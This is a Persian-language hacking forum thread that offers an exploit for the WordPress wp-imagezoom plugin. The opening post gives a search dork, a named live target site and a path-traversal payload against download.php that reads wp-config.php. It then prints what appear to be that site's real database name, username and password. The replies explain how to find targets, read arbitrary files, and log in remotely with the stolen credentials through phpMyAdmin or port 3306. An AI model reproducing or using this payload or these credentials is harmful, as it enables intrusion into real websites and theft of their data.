Wp-imagezoom LFD Exploit

جمع کردن
X
جمع کردن
 
  • صفحه از 1
  • زمان
  • نمایش
پاک کردن همه
پست‌های جدید
قبلی template بعدی
  • Mr.XpR
    پیشکسوت
    • May 2012
    • 971
    #1

    Wp-imagezoom LFD Exploit

    [align=LEFT]
    کد:
    Local File Disclosure (LFD)


inurl  : wp-content/plugins/wp-imagezoom

Target : http://estanciarural.com/anuncio/wp-content/plugins/wp-imagezoom/

usage  : download.php?file=../../../wp-config.php


define('DB_NAME', 'ahosta43_wrdp28');
/** MySQL database username */
define('DB_USER', 'ahosta43_wrdp28');
/** MySQL database password */
define('DB_PASSWORD', '{OkdhkbQod8W');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
    [/align]
    [align=center][/align]
    برچسب‌ها: هیچکدام
    • rahrast
      تازه وارد
      • Jul 2012
      • 22
      #2
      RE: Wp-imagezoom LFD Exploit

      چطور میشه از این اکسبلویت در باگ ال اف دی استفاده کرد ؟
      میشه توضیح بدید ؟
      ><><><><><><><><>><NaMe Of GoD><><><><><><><><><

        نظر

        • Moji.Rider
          عضو متعهد
          • Jun 2012
          • 299
          #3
          RE: Wp-imagezoom LFD Exploit

          درود
          ابتدا تارگت خودتون رو انتخاب میکنید حالا چه از طریق دورک پیداش میکنید و یا هرچیز دیگه و سپس به آدرس زیر رفته :
          [align=left]
          کد:
          wp-content/plugins/wp-imagezoom/
          [/align]
          سپس به صفحه ی download.php مراجعه کنید و به شمل زیر، فایل php مورد نظرتون رو مشاهده کنید که هر فایلی میتونه باشه مثل ایندکس و یا کانفیگ :
          [align=left]
          کد:
          download.php?file=../../../file.php
          [/align]
          بدرود..
           
          [align=center]مشاجره، نادانی انسان را آشکار می کند و چیزی به مطلب حق او نمی افزاید. امام علی (ع)

          همانا ارزشمند ترين بی نيازی عقل، بزرگ ترين فقر بی خردی، ترسناك ترين تنهايی خود پسندی و گرامی ترين ارزش خانوادگی، اخلاق نيكوست. امام علی (ع)[/align]
           

            نظر

            • Mr.3ler0n
              عضو فعال
              • Jul 2013
              • 71
              #4
              RE: Wp-imagezoom LFD Exploit

              خب ما اینجا تمامی کارها رو انجام دادیم و به کانفیگ دسترسی پیدا کده و آنرا خواندیم. برای وارد شدن به صفحه Php MyAmin چطور باید عمل کنیم؟


              حسین جان یه نرم افزار بود میشه لینک بدی؟ اگر روش دیگه ای هم هست دوستان ذکر کنند متشکریم .... ♥
              نام کاربری و فعالیت مجدد به 3cure تعلق و تغییر یافت...

                نظر

                • Mr.XpR
                  پیشکسوت
                  • May 2012
                  • 971
                  #5
                  RE: Wp-imagezoom LFD Exploit

                  اگر قابلیت ریموت از سمت سرور محدود نباشه میتونی ریموت connect بشی ، اگر phpmyadmin روی سرور باز باشه یا با پورت 3306 یا url

                  کد:
                  site.com/phpmyadmin
site.com:3306
                  باز هم میتونی متصل بشی از طریق یوزر و پس دیتابیسی که از کانفیگ گرفتی .

                  اون نرم افزار هم SQL YOG نام داره که میتونی از لینک زیر دریافت کنی :

                  نسخه 32 بیتی :

                  http://uploaderx.persiangig.com/tools/SQLYog.Ultimate.11.1.1.0_32_bit.zip

                  نسخه 64 بیتی :

                  http://uploaderx.persiangig.com/tools/SQLYog.Ultimate.11.1.1.0_64_bit.zip

                  ابزار های بیشتر هم در قسمت :

                  http://iranhack.com/tools
                  [align=center][/align]

                    نظر

                    قبلی template بعدی
                    در حال کار...